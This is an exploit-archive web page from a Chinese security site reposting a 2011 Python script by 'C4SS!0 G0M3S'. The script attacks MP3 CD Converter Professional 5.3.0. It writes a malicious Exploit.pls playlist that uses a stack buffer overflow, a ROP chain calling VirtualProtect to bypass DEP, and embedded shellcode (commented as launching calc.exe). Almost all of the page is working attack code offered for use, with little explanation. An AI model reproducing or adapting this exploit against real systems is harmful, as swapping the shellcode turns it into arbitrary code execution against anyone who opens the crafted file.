首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
MP3 CD Converter Professional 5.3.0 Universal DEP Bypass Exploit
来源:net-fuzzer.blogspot.com 作者:G0M3S 发布时间:2011-08-12  

#!/usr/bin/python
#
#[+]Exploit Title: MP3 CD Converter Professional Universal DEP Bypass Exploit
#[+]Date: 11\08\2011
#[+]Author: C4SS!0 G0M3S
#[+]Software Link: http://www.mp3-cd-converter.com/mp3cdconverter.exe
#[+]Version: 5.3.0
#[+]Tested On: WIN-XP SP3 Brazilian Portuguese
#[+]CVE: N/A
#

from struct import pack
from time import sleep
from sys import exit
print '''

  Created By C4SS!0 G0M3S
  E-mail louredo_@hotmail.com
  Blog net-fuzzer.blogspot.com
'''
sleep(2)

shellcode = ("\xba\xcb\x38\xf3\xb9\xd9\xc7\xd9\x74\x24\xf4\x5f\x2b\xc9"
"\xb1\x32\x83\xef\xfc\x31\x57\x0e\x03\x9c\x36\x11\x4c\xde"
"\xaf\x5c\xaf\x1e\x30\x3f\x39\xfb\x01\x6d\x5d\x88\x30\xa1"
"\x15\xdc\xb8\x4a\x7b\xf4\x4b\x3e\x54\xfb\xfc\xf5\x82\x32"
"\xfc\x3b\x0b\x98\x3e\x5d\xf7\xe2\x12\xbd\xc6\x2d\x67\xbc"
"\x0f\x53\x88\xec\xd8\x18\x3b\x01\x6c\x5c\x80\x20\xa2\xeb"
"\xb8\x5a\xc7\x2b\x4c\xd1\xc6\x7b\xfd\x6e\x80\x63\x75\x28" # Shellcode WinExec "Calc.exe"
"\x31\x92\x5a\x2a\x0d\xdd\xd7\x99\xe5\xdc\x31\xd0\x06\xef" # BadChars "\x00\x3d"
"\x7d\xbf\x38\xc0\x73\xc1\x7d\xe6\x6b\xb4\x75\x15\x11\xcf"
"\x4d\x64\xcd\x5a\x50\xce\x86\xfd\xb0\xef\x4b\x9b\x33\xe3"
"\x20\xef\x1c\xe7\xb7\x3c\x17\x13\x33\xc3\xf8\x92\x07\xe0"
"\xdc\xff\xdc\x89\x45\xa5\xb3\xb6\x96\x01\x6b\x13\xdc\xa3"
"\x78\x25\xbf\xa9\x7f\xa7\xc5\x94\x80\xb7\xc5\xb6\xe8\x86"
"\x4e\x59\x6e\x17\x85\x1e\x80\x5d\x84\x36\x09\x38\x5c\x0b"
"\x54\xbb\x8a\x4f\x61\x38\x3f\x2f\x96\x20\x4a\x2a\xd2\xe6"
"\xa6\x46\x4b\x83\xc8\xf5\x6c\x86\xaa\x98\xfe\x4a\x2d")
################################ROP START HERE############################################
rop = pack('<L',0x00425C69) * 4 # RETN
rop += pack('<L',0x0045125a) # PUSH ESP # POP ESI # RETN 04
rop += pack('<L',0x00425C69) * 2 # RETN
rop += pack('<L',0x0046194c) # XCHG EAX,ESI # RETN
rop += pack('<L',0x0040d8b1) # XCHG EAX,ECX # CLD # ADD AL,0 # POP EDI # POP ESI # POP EBP # POP EBX # ADD ESP,8 # RETN 04
rop += "A" * 24 # JUNK
rop += pack('<L',0x00425C69) * 2 # RETN
rop += pack('<L',0x10008d68) # POP EDI # RETN
rop += pack('<L',0x00425C69) # RETN
rop += pack('<L',0x1000176a) # POP EBP # RETN
rop += pack('<L',0x004319e6) # PUSH ESP # RETN // Endereco de retorno da funcao VirtualProtect
rop += pack('<L',0x0043017a) # POP EBX # RET
rop += pack('<L',0x00000500) # Valor de dwSize
rop += pack('<L',0x004078f6) # POP EDX # ADD EAX,4C48300 # POP ESI # RETN
rop += pack('<L',0x00000040) # Valor de flNewProtect
rop += "BBBB" # JUNK
rop += pack('<L',0x0040dc8c) # POP ESI # RETN
rop += pack('<L',0x01E5225F) # JMP DWORD PTR DS:[EAX] // Jmp to eax, EAX == VirtualProtect
rop += pack('<L',0x00444ad3) # POP EAX # RETN
rop += pack('<L',0x007EC070) # Ponteiro para VirtualProtect
rop += pack('<L',0x1000734d) # PUSHAD # RETN
################################ROP END HERE###############################################
buf = ("A" * 16)
buf += pack('<L',0x00456333) # ADD ESP,318 # RETN 4
buf += ("B" * (784-len(buf)))
buf += pack('<L',0x004462D0) # ADD ESP,51C # RETN
buf += ("A" * 24)
buf += rop
buf += "\x90" * 10
buf += shellcode
buf += "C" * 50000
print "\t\t[+]Creating Exploit File..."
sleep(1)
try:
 f = open("Exploit.pls","wb")
 f.write(buf)
 f.close()
 print "\t\t[+]File \"Exploit.pls\" Created Succefully."
 sleep(1)
except  IOError,e:
 print "\t\t[+]Error: "+str(e)
 exit(-1)


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·PhpMyadmin XSRF Vuln (Execute
·Allomani Songs & Clips 2.x (ms
·TeeChart Professional ActiveX
·Simple HTTPd 1.42 Denial of Se
·Mozilla Firefox 3.6.16 mChanne
·MS10-026 Microsoft MPEG Layer-
·BisonFTP Server <=v3.5 Remote
·SikaBoom Remote Buffer Overflo
·HP Data Protector Remote Root
·NSHC Papyrus Heap Overflow Vul
·A-PDF All to MP3 v2.3.0 Univer
·D.R. Software Audio Converter
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved